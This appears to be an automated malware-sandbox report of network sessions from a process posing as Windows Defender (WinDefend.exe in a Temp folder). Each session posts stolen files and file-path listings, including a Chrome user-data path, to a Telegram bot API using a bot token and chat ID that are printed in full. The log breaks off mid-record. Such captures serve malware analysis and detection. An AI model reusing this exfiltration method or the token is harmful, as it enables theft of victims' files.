2024-05-23 13:34:55 UTC	4096	OUT	Data Raw: 58 fb 41 0b 00 20 84 38 16 b1 65 4c 5e 03 70 9d d5 c7 22 22 a2 ee a5 69 da 0a a8 c5 01 d3 0a 79 bb 08 77 27 83 33 11 33 36 67 ce 9c 84 e3 d1 55 c8 db 45 b8 3b 79 f6 ec d9 1c 8f 02 e0 72 b9 8e 06 f0 20 a2 d7 64 f9 10 c0 b8 c5 8b 17 7f 9a 9f 5e d9 ca cd 00 2a 22 1e 77 00 b8 c0 eb f3 fe de eb f3 26 bc b3 d9 eb f3 ee f1 fa bc 5e a8 c5 d8 22 7f af f6 03 f0 87 9c f4 b4 34 2c 80 b5 d9 5a 3f a8 ba b1 94 99 5b 10 3d 1e bb 01 8c 09 04 02 0b 03 81 c0 be 44 2f 0a 04 02 6d 81 40 60 06 80 9f 99 9e ea 07 e0 f7 d6 77 d3 7a 76 2c d1 a0 6f db b6 6d 67 4b 4b cb c6 aa aa aa 23 db db db 3f cf 77 87 4a 9d 10 e2 db 50 a1 6d bc 40 f0 33 a8 05 58 d6 00 d8 28 a5 fc 24 c5 36 2f 81 ba 65 27 d2 fd 00 26 4b 29 f7 95 d2 2d d0 46 a8 3b 05 d1 8b aa 85 35 5b 71 0c 29 65 ab 10 e2 69 00 23 Data Ascii: XA 8eL^p""iyw'336gUE;yr d^*"w&^"4,Z?[=D/m@`wzv,omgKK#?wJPm@3X($6/e'&K)-F;5[q)ei#
2024-05-23 13:34:55 UTC	4096	OUT	Data Raw: 80 6b a1 ce 23 ca a0 fe 6d 7b 03 b8 d5 e5 72 fd cc bc bf cb e5 1a 0c e0 41 00 7d d1 59 77 77 27 80 49 7e bf ff c3 ee ea 77 09 98 01 c0 bc 26 c4 bd 1e b7 47 76 55 ae c1 e3 f6 f4 f6 b8 3d 73 a0 02 e2 c8 3b 04 db 01 5c 6f 7d 37 4b c6 34 44 9f 63 67 eb 33 c4 06 f0 94 ba 6b 11 3d 1e 3d 00 ac 72 3a 9d 1e a7 d3 99 b0 8c ab d3 e9 ec e7 74 3a 6f 45 6c 3e 62 9b f1 b0 43 80 d6 6b f5 ea d5 e7 f5 ef df 7f b8 ae eb 7b 1f 79 e4 91 e5 50 e1 62 3f 00 87 3e f2 c8 23 6c 90 1e 4a 00 00 20 00 49 44 41 54 e3 43 a1 d0 9d 6d 6d 6d ff ba e9 a6 9b 9e bd f0 c2 0b 6f af a8 a8 38 e8 b3 cf 3e 7b be bd bd fd bd 70 23 bb 76 ed fa 70 dd ba 75 62 fc f8 f1 67 5c 72 c9 25 27 5f 79 e5 95 a7 4e 98 30 e1 d4 89 13 27 d6 4c 9b 36 ad e6 be fb ee fb c9 b6 6d db 9e 39 e9 a4 93 7e 07 15 1a 53 02 c6 Data Ascii: k#m{rA}Yww'I~w&GvU=s;\o}7K4Dcg3k==r:t:oEl>bCk{yPb?>#lJ IDATCmmmo8>{p#vpubg\r%'_yN0'L6m9~S
2024-05-23 13:34:55 UTC	4096	OUT	Data Raw: 11 11 11 11 11 11 11 11 91 4d 31 e0 25 22 22 22 22 22 22 22 22 22 b2 29 06 bc 44 44 44 44 44 44 44 44 44 44 36 c5 80 97 88 88 88 88 88 88 88 88 88 c8 a6 18 f0 12 11 11 11 11 11 11 11 11 11 d9 14 03 5e 22 22 22 22 22 22 22 22 22 22 9b 62 c0 4b 44 44 44 44 44 44 44 44 44 64 53 0c 78 89 88 88 88 88 88 88 88 88 88 6c 8a 01 2f 11 11 11 11 11 11 11 11 11 91 4d 31 e0 25 22 22 22 22 22 22 22 22 22 b2 29 06 bc 44 44 44 44 44 44 44 44 44 44 36 c5 80 97 88 88 88 88 88 88 88 88 88 c8 a6 18 f0 12 11 11 11 11 11 11 11 11 11 d9 14 03 5e 22 22 22 22 22 22 22 22 22 22 9b 62 c0 4b 44 44 44 44 44 44 44 44 44 64 53 0c 78 89 88 88 88 88 88 88 88 88 88 6c 8a 01 2f 11 11 11 11 11 11 11 11 11 91 4d 31 e0 25 22 22 22 22 22 22 22 22 22 b2 29 06 bc 44 44 44 44 44 44 44 44 44 44 36 Data Ascii: M1%""""""""")DDDDDDDDDD6^""""""""""bKDDDDDDDDDdSxl/M1%""""""""")DDDDDDDDDD6^""""""""""bKDDDDDDDDDdSxl/M1%""""""""")DDDDDDDDDD6
2024-05-23 13:34:55 UTC	4096	OUT	Data Raw: d5 90 97 e1 ae f5 18 ee 16 16 ab ca 64 f8 fd fe 56 97 cb 35 0a c0 7a c4 09 79 11 3b c3 97 88 28 6d 4e a7 f3 24 a8 89 05 56 1b e6 74 3a 7f 00 b5 70 70 c1 2a 84 12 0d e7 02 48 76 1b 6d d4 89 41 6d 6d ed 4e a8 95 d3 23 43 d9 9b cd e1 6e 30 18 2c 47 6a 53 b3 53 5e 3c a1 04 24 fb b7 18 ac eb fa cf 22 37 68 9a f6 09 54 30 fb 72 c4 e6 98 70 57 d7 f5 fe 48 5e bb 44 4b a1 0f 25 a1 ca dd 58 59 e5 6e dc 04 b5 40 4d bc 70 17 b0 f6 e4 2c 5e 5b 47 19 c7 0f 81 ab 79 16 14 5d d7 d7 9b b7 69 9a 76 44 87 4e bf ca 00 00 20 00 49 44 41 54 3e fa 52 08 8c 7a bb 3f 06 b0 2b 62 73 4f 00 0f 55 b9 1b 07 59 71 8c f2 f2 f2 2b 01 8c 35 6d f6 86 7c 35 31 63 41 64 37 0e 87 63 30 80 20 62 43 c0 8f 00 fc 0a c0 61 0d 0d 0d 97 37 34 34 3c 96 4a b8 3b 7a f4 68 cd e1 70 dc 08 55 3e 26 32 fc Data Ascii: dV5zy;(mN$Vt:pp*HvmAmmN#Cn0,GjSS^<$"7hT0rpWH^DK%XYn@Mp,^[Gy]ivDN IDAT>Rz?+bsOUYq+5m\|51cAd7c0 bCa744<J;zhpU>&2
2024-05-23 13:34:55 UTC	4096	OUT	Data Raw: c3 5d 0d 90 89 89 89 2f 03 2f 02 7e 32 8b cd ef 06 5e 3a 31 31 d1 53 e5 43 bb e9 03 f8 e9 cc ff 65 b0 6f 3f f2 c8 23 bd f4 36 27 84 f0 08 90 2f ad d0 6e 8f 90 fc 1f 18 74 eb 28 3f e9 3a 6c 64 6c f2 8c 7a 1b dd bf 7a f1 2f 7f 75 fe f3 0e ff d5 f9 cf 7b e9 fd ab 17 df 53 6f fd cd ab 9f b3 f9 d7 ff f8 bc 15 bf fe c7 e7 2d bb 7f f5 e2 ba f5 69 46 c6 26 4f 02 96 57 68 ab 5a e3 ec cc ef 0f a6 a3 71 cb a4 61 6e 76 c4 69 08 21 54 fa 02 eb f5 94 97 6a 38 bb c2 3a 92 a4 ce 6b 24 e0 dd 9a fe db c8 24 6b a5 80 d7 49 d6 9a f7 09 e6 18 ee 96 d4 08 79 3f 3e a7 16 0e 30 43 5e a9 ba 6a 23 79 73 b7 0f 4b 7f 4a 0c 77 35 10 26 26 26 ee 00 0e 06 56 02 8d 4c 92 f6 2b 92 ab 62 9f 35 31 31 f1 dd 76 b6 ad 1d ba 26 e0 5d b6 6c d9 0f 81 77 ce e3 21 ff 69 d9 b2 65 37 cc e3 f1 7a 4a Data Ascii: ]//~2^:11SCeo?#6'/nt(?:ldlzz/u{So-iF&OWhZqanvi!Tj8:k$$kIy?>0C^j#ysKJw5&&&VL+b511v&]lw!ie7zJ
2024-05-23 13:34:55 UTC	4096	OUT	Data Raw: f0 db 66 8e 17 63 dc 1f 78 27 49 ad b9 7d 72 77 3f 00 bc 3a 84 70 73 66 fd 66 76 df 37 aa f5 4b 7a 42 77 2d ad ed 93 3f 00 fe 96 06 fb 24 dd a6 99 43 f4 1b 03 de ee d0 d2 7e a8 f0 f8 ee 07 9c 03 9c 9d 59 f6 1b 60 59 08 e1 f6 01 7f 0e d4 62 bf 74 40 8d f7 8c c5 24 13 9c e6 03 d9 cd 24 ef 19 1f 9a 4d ff c4 18 4f 24 29 2d b0 b0 c2 7e 8f cd 97 08 18 b4 7e a9 d1 1f fb 92 f4 47 3e 6c b7 3f 34 d0 4a cf 99 95 63 2b 17 92 4c 30 b8 b0 05 bb dd 0c 6c 5c 3b be f6 0e ff cf 37 27 84 c0 f2 e5 cb 9f 08 bc 8a 99 e7 06 b3 75 3f b0 61 62 e5 6a 71 2d 00 00 20 00 49 44 41 54 62 e2 17 bd d4 1f 06 bc 52 77 69 f5 48 92 56 cb 8f 4c e9 f7 13 76 fb a3 cb d4 38 09 59 02 fc 1b f0 98 dc 5d 57 92 94 53 f8 d5 5c 8e 1b 63 7c 22 f0 cf c0 09 b9 bb 1e 26 99 3c e7 e6 74 bd b9 1c a6 67 55 ea Data Ascii: fcx'I}rw?:psffv7KzBw-?$C~Y`Ybt@$$MO$)-~~G>l?4Jc+L0l\;7'u?abjq- IDATbRwiHVLv8Y]WS\c\|"&<tgU
2024-05-23 13:34:55 UTC	4096	OUT	Data Raw: fe b6 89 4b d2 ae 0e 21 1c 09 ec 0d ec d7 c0 cf 5e 21 84 6b 3a f4 e7 75 9d 74 14 5b b6 c4 c2 de 75 d6 7f 28 84 70 c7 5c 82 a7 10 c2 fd 21 84 6f d7 09 77 a1 bc 26 5a bd 75 fb 4d f6 ef ad 55 1b ee 14 76 95 73 f8 33 60 7d 8c f1 09 8d 1e 24 c6 f8 0c 92 89 f3 4a db 3c 99 99 f5 dd b3 b2 ff 3f 7e 47 85 89 f5 06 40 be 2c c3 42 1a 7b ed c9 ff e4 7d 34 f3 fb 1b 81 1b 1a 1d dd 28 20 19 c0 f0 45 66 86 bb f7 c7 e4 6c 3a 92 94 95 29 13 63 bc 38 fb 86 92 bb 7b 4f 92 11 71 e7 b4 a3 c1 83 a8 de 08 eb 3a 1c 59 dd 1a 27 d1 9a 91 b5 9b a9 3c ea 31 6b 61 0b 8e d3 8b ca 4a 32 d4 79 2d 5f 41 6b fa 63 53 ba 2f cd 52 b1 58 fc 08 f0 8e dc e2 37 00 5f 2d 14 0a fb 74 a0 49 03 ad d2 48 de 12 c3 5d cd 97 ae 0f 78 01 42 08 57 92 5c 5e 9e 0d 79 5f 07 7c 2d c6 f8 07 9d 69 95 1a 15 63 3c Data Ascii: K!^!k:ut[u(p\!ow&ZuMUvs3`}$J<?~G@,B{}4( Efl:)c8{Oq:Y'<1kaJ2y-_AkcS/RX7_-tIH]xBW\^y_\|-ic<
2024-05-23 13:34:55 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:55 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.5	61143	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:55 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="61c18d17-b096-44fa-8cb1-9f4c3a4488c4" Host: api.telegram.org Content-Length: 25657 Expect: 100-continue
2024-05-23 13:34:55 UTC	40	OUT	Data Raw: 2d 2d 36 31 63 31 38 64 31 37 2d 62 30 39 36 2d 34 34 66 61 2d 38 63 62 31 2d 39 66 34 63 33 61 34 34 38 38 63 34 0d 0a Data Ascii: --61c18d17-b096-44fa-8cb1-9f4c3a4488c4
2024-05-23 13:34:55 UTC	93	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 32 35 36 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 32 35 36 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=256.png; filename*=utf-8''256.png
2024-05-23 13:34:55 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 20 00 49 44 41 54 78 9c ec bd 59 ac 25 c7 79 26 f8 fd 91 99 67 b9 4b ad 2c 6e 12 45 52 a2 44 89 a2 36 53 96 2c 5b 76 97 ed 96 1a 36 3c 16 dc 46 c9 98 91 1b 68 8f 61 1b b0 31 8d 9e a7 c6 3c 89 c2 a0 81 79 99 c6 34 7a e0 c1 3c 35 d0 9e 79 18 d5 8c 07 70 cf 8c 6c d9 32 4b b4 48 49 14 8b e2 56 c5 9d 55 5c 6a bd b5 dc f5 6c 99 11 ff 3c 64 c6 39 71 22 23 72 39 f7 9c 5b b7 e4 fc c0 e2 3d 91 19 f1 c7 1f cb bf 45 46 46 02 0d 1a 34 68 d0 a0 41 83 06 0d 1a 34 68 d0 a0 41 83 06 0d 1a 34 68 d0 a0 41 83 06 0d 1a 34 68 d0 a0 41 83 06 0d 1a 34 68 d0 a0 41 83 06 0d 1a 34 68 d0 a0 41 83 06 0d 1a 34 68 d0 a0 41 83 06 0d 1a 34 68 d0 a0 41 83 06 0d 1a 34 68 d0 a0 41 83 06 Data Ascii: PNGIHDR\rf IDATxY%y&gK,nERD6S,[v6<Fha1<y4z<5ypl2KHIVU\jl<d9q"#r9[=EFF4hA4hA4hA4hA4hA4hA4hA4hA4hA
2024-05-23 13:34:55 UTC	4096	OUT	Data Raw: b8 16 03 73 52 fd 6d 40 30 40 cb 57 77 1e 90 e0 af 23 8e bb c3 38 66 12 42 80 39 75 35 2c 42 f6 1e 7f df ca ff d4 3e 00 db a2 a7 84 e6 f3 58 af ae 5b f7 b3 62 05 f6 0b 6e 97 b8 fa 67 c9 03 48 d7 02 b4 7c 06 fd 24 01 c7 49 5b f5 fb bf 11 bc 7f ee 03 99 f0 e7 e4 dd b9 5b 88 00 be de df fa 68 4b 26 9f 4f 08 e1 48 b1 a2 00 81 3e d3 4d bf d6 3b ce ef 7a b6 0f 4c 5d 9b f2 02 4c 25 a0 d3 b6 22 b0 f3 33 57 7f bd d7 5e 58 2c 1b 54 d7 ba 83 2b 6d f3 b3 5b d4 a1 59 b7 7e b6 7e 3b 23 25 9e fa ed dc a4 35 0b 88 f2 ef 72 28 b5 77 82 65 8e bb f9 d7 46 d1 7c bb 1d 95 c0 24 34 27 49 a4 04 21 8c 06 bd cf 24 32 f9 30 01 cf 7f db 51 24 27 41 5f 07 e4 7b ff ee df 75 55 3c fc 54 38 1c ae 0a 66 16 24 24 98 49 65 ff cc 58 de 65 f1 81 bc f0 8f 4f d5 35 85 d3 67 d1 cb 56 d9 6d c5 Data Ascii: sRm@0@Ww#8fB9u5,B>X[bngH\|$I[[hK&OH>M;zL]L%"3W^X,T+m[Y~~;#%5r(weF\|$4'I!$20Q$'A_{uU<T8f$$IeXeO5gVm
2024-05-23 13:34:55 UTC	4096	OUT	Data Raw: dd 7f a0 e2 d6 5f 93 7f 5f fc 5f c7 42 d6 c9 9f eb 7f 9d f6 b8 d4 55 d7 20 66 b5 e8 40 b1 47 ab 69 55 7d 0a 51 62 c0 aa 79 a1 c0 de be 00 00 20 00 49 44 41 54 f4 05 fc 16 1a 37 26 c9 0c 10 3a 4a 88 bb 43 1a d1 01 c9 dc 52 cc 10 3e 5b 65 0b 8c cd 4d a9 8f 52 c4 bd 55 87 ce 6b bb d4 76 3d 45 ca c5 35 80 26 7f 66 1d 53 bc d9 02 3e 55 d8 6c 8c 9f ae af 2e 1b b6 c0 4d b5 99 0c 2e 28 5d 20 04 20 93 04 02 c0 1d dd 36 56 1f 78 00 ad 43 87 b0 f6 f0 c7 b1 f5 c2 4f 71 f9 8e 63 e8 bc fb 0e 0e 5e bd 0c b9 76 15 d1 28 46 d8 ed 20 10 21 40 80 54 ca 90 a7 54 a0 8c b7 3f 8b 5d 64 97 f2 2e 0b 19 ec b6 56 ca 6f 0a bc 2b e4 32 50 c4 5f d9 7c 28 9b af 3e 97 ba 6c 23 54 11 0f 66 fe 12 85 55 cd a3 b7 e8 56 dc 8a 2d 40 ac 00 10 23 0c e2 a4 1b 22 88 ee 21 31 ec 66 2b d0 ee 2a 16 Data Ascii: ___BU f@GiU}Qby IDAT7&:JCR>[eMRUkv=E5&fS>Ul.M.(] 6VxCOqc^v(F !@TT?]d.Vo+2P_\|(>l#TfUV-@#"!1f+*
2024-05-23 13:34:55 UTC	4096	OUT	Data Raw: 40 04 80 7e 68 68 5a f8 45 7d a7 a0 86 45 2f 0d 41 1c f1 ff fc df fe 1b d7 80 d2 d7 ab 33 ec 61 08 e0 72 ef eb 08 3c f2 79 ec 0e 76 2d cc 99 7f 35 8a 06 b6 0a 3d b3 8c be 3e 4b cc 5f 47 7f ee 33 94 bd 5c 44 44 e8 76 bb 08 c3 10 42 08 f4 fb 7d 48 29 c7 eb 06 fa 69 01 33 83 93 04 f2 e6 4d 50 10 a0 75 ff 83 58 7a e4 51 c8 47 3f 8d ad fb ee 43 ef b9 87 d1 3b f7 16 c4 da 15 ac 6c 6e 02 00 94 10 93 b3 06 52 26 f2 02 e1 1a 93 05 09 f4 f8 5a c5 7d 08 f5 e5 d9 0a 59 bc 21 8e cf 40 c3 91 4e 51 51 01 b8 88 99 7f f5 ef 22 9f d6 b5 06 00 2b 5d 43 e0 5d 16 ba 2c 46 37 e9 d8 1d e8 a2 e7 aa db 55 ff ac 31 ff cf 40 08 00 e4 95 80 79 28 69 10 04 58 5d 5d 45 14 45 d8 d9 d9 41 92 24 b9 32 44 04 d2 df 3e 1c f4 21 07 03 88 a3 47 71 f8 f7 be 81 83 bf f6 15 dc fc 9b ef 80 ff ea Data Ascii: @~hhZE}E/A3ar<yv-5=>K_G3\DDvB}H)i3MPuXzQG?C;lnR&Z}Y!@NQQ"+]C],F7U1@y(iX]]EEA$2D>!Gq
2024-05-23 13:34:55 UTC	4096	OUT	Data Raw: 1e a7 39 27 74 91 85 1a e7 67 40 65 5b 75 19 13 a1 0d c3 f1 7b f9 18 0c 20 df 7f 0f f1 0f 4e 61 f4 0f 4f a4 2f ee 6c 6f 03 c3 74 bf 7e aa e0 33 05 a6 d2 49 43 68 ce f2 48 00 00 20 00 49 44 41 54 9a 8e 37 c6 b4 07 a0 c4 e5 9a 35 86 b7 31 af 98 7c 97 c2 3c 55 47 85 f6 94 ea 71 9f f5 af fd dc bf 48 21 d7 a3 6f 8c 20 07 04 04 ac 7a 07 94 7a 3f 04 d6 2f 13 0e 0e 1c 1c 2c 0e 73 75 2f aa c3 76 ed 77 1d e3 fb 14 c2 3c c0 c8 06 51 81 82 28 dd af ff ea 59 8c 9e f8 3b c8 97 5f 42 72 f1 3d a8 ab 57 c0 fd 41 3e 3c b1 3d 90 bd c0 bc db 7f ab eb 5a 74 1d b5 e9 17 b9 d0 d5 e9 8f 83 0a 01 35 20 91 84 57 cf ae 5d 3b f2 99 43 fd 6c 51 97 89 01 45 94 7f 04 bc 1b f8 2c bc 8b 33 78 f2 4e cd 6f b7 c5 f7 1d c9 55 e5 f5 5c 7b 95 7d 0a ae 98 36 cd 38 49 97 b9 fc b6 85 b3 07 c8 48 Data Ascii: 9'tg@e[u{ NaO/lot~3IChH IDAT751\|<UGqH!o zz?/,su/vw<Q(Y;_Br=WA><=Zt5 W];ClQE,3xNoU\{}68IH
2024-05-23 13:34:55 UTC	4096	OUT	Data Raw: 21 75 2a 00 06 40 eb 89 3a bf 03 7e 2a 06 c9 16 11 31 41 29 22 52 44 c4 8e 42 95 30 4f 8b 5a 36 b2 55 04 de 2c ef 52 5e 3e 01 49 6f 9a 0d 03 4a dd 7d 58 f9 61 dc cf ae f9 04 76 1e 2e bf cf cd 34 eb 32 d3 76 de 2a 0a c4 16 e0 b2 f6 f8 04 ce a6 ef 53 3a 26 bf 46 b9 2a d9 73 d5 95 29 38 b3 9e dc 5c d0 e3 5d 64 00 ac 32 75 fb a3 68 7e 73 ba f0 a7 98 29 5b ab e3 30 dd 01 94 ec 80 5f 19 a8 f8 ec e3 40 92 67 c2 a1 00 28 db 7a f6 97 d7 b7 2e c6 31 be 2b 81 7e 20 44 7a 92 50 b6 08 30 f3 c6 a0 ba 30 27 90 cb 5a fb 54 fa 3c 04 1e 70 0c b6 25 b0 95 63 7c 9d df a4 a3 af 19 13 ce 27 b0 fa b7 5e 93 f0 59 7c bb 7d 55 15 88 cf ea 9a fd 50 25 bd 1b 05 54 c5 e3 28 49 97 18 c8 c2 e6 ce e4 41 39 e3 7e 18 69 32 fe 59 0c d5 ed 8f a2 f1 a4 f4 bb 7f 48 9f d4 31 11 64 5b 08 8a 99 Data Ascii: !u@:~1A)"RDB0OZ6U,R^>IoJ}Xav.42vS:&Fs)8\]d2uh~s)[0_@g(z.1+~ DzP00'ZT<p%c\|'^Y\|}UP%T(IA9~i2YH1d[
2024-05-23 13:34:55 UTC	763	OUT	Data Raw: 48 f5 9d f3 37 70 03 cb 46 2d f5 cc 8f 9c e9 d8 a6 f3 43 e7 b4 63 ef ea bd 63 f0 f7 bf 09 ad 03 fe dc f4 0a b1 77 0c df 4b 07 40 01 78 a9 d2 e1 c5 78 e3 ed 69 2c be 7c e6 cc f1 de f0 84 fb 4e ff ee ed c8 58 00 00 02 9e 49 44 41 54 66 71 6a 79 b7 f7 40 76 62 a5 5f 14 e6 49 ed 49 dc 01 d0 93 2d ad 9a cb 8e 69 8f 23 65 1c 62 08 9f 65 96 81 fd 7e ee 7a c8 00 8c 46 d8 85 38 02 e0 5d cf 8e 15 45 d6 a7 65 40 39 5f f5 00 f3 6a c5 c5 a2 b0 5e 46 9f 39 33 07 00 56 40 de 81 f5 7d 5b 92 4c 66 8e 7e d4 eb 91 99 33 c7 02 ed b7 69 52 be 40 a1 d5 a5 9e dd 0d a0 7e 6f 1b 4b 33 06 84 c2 48 33 1f 9e 77 08 72 3b 6a d9 09 c7 1d 40 3f 3e b9 2d 47 ef ca 77 4a 51 26 29 2f a0 81 87 ed 40 2a 8c 10 7d b9 10 0c ad 49 6e 75 1d 18 80 81 f2 50 39 a4 93 79 41 6d 15 05 76 bd 99 c1 7b c1 Data Ascii: H7pF-CccwK@xxi,\|NXIDATfqjy@vb_II-i#ebe~zF8]Ee@9_j^F93V@}[Lf~3iR@~oK3H3wr;j@?>-GwJQ&)/@*}InuP9yAmv{
2024-05-23 13:34:55 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 36 31 63 31 38 64 31 37 2d 62 30 39 36 2d 34 34 66 61 2d 38 63 62 31 2d 39 66 34 63 33 61 34 34 38 38 63 34 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --61c18d17-b096-44fa-8cb1-9f4c3a4488c4Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:34:55 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:55 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:55 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.5	61144	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:55 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 178 Expect: 100-continue
2024-05-23 13:34:55 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:55 UTC	178	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 53 74 61 6e 64 61 72 64 2e 70 64 66 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 70 6c 75 67 5f 69 6e 73 25 35 43 41 6e 6e 6f 74 61 74 69 6f 6e 73 25 35 43 53 74 61 6d 70 73 25 35 43 45 4e 55 25 35 43 53 74 61 6e 64 61 72 64 2e 70 64 66 25 30 41 53 69 7a 65 25 33 41 2b 31 31 33 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+Standard.pdf%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5Cplug_ins%5CAnnotations%5CStamps%5CENU%5CStandard.pdf%0ASize%3A+113+KB
2024-05-23 13:34:56 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:55 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.5	61145	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:56 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 193 Expect: 100-continue
2024-05-23 13:34:56 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:56 UTC	193	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 64 64 5f 61 72 72 6f 77 5f 73 6d 61 6c 6c 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 64 64 5f 61 72 72 6f 77 5f 73 6d 61 6c 6c 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 31 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+dd_arrow_small.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5Cdd_arrow_small.png%0ASize%3A+1+KB
2024-05-23 13:34:57 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:57 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.5	61146	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:56 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 347 Expect: 100-continue
2024-05-23 13:34:56 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:56 UTC	347	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 33 32 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 35 43 44 65 66 61 75 6c 74 25 35 43 57 65 62 2b 41 70 70 6c 69 63 61 74 Data Ascii: 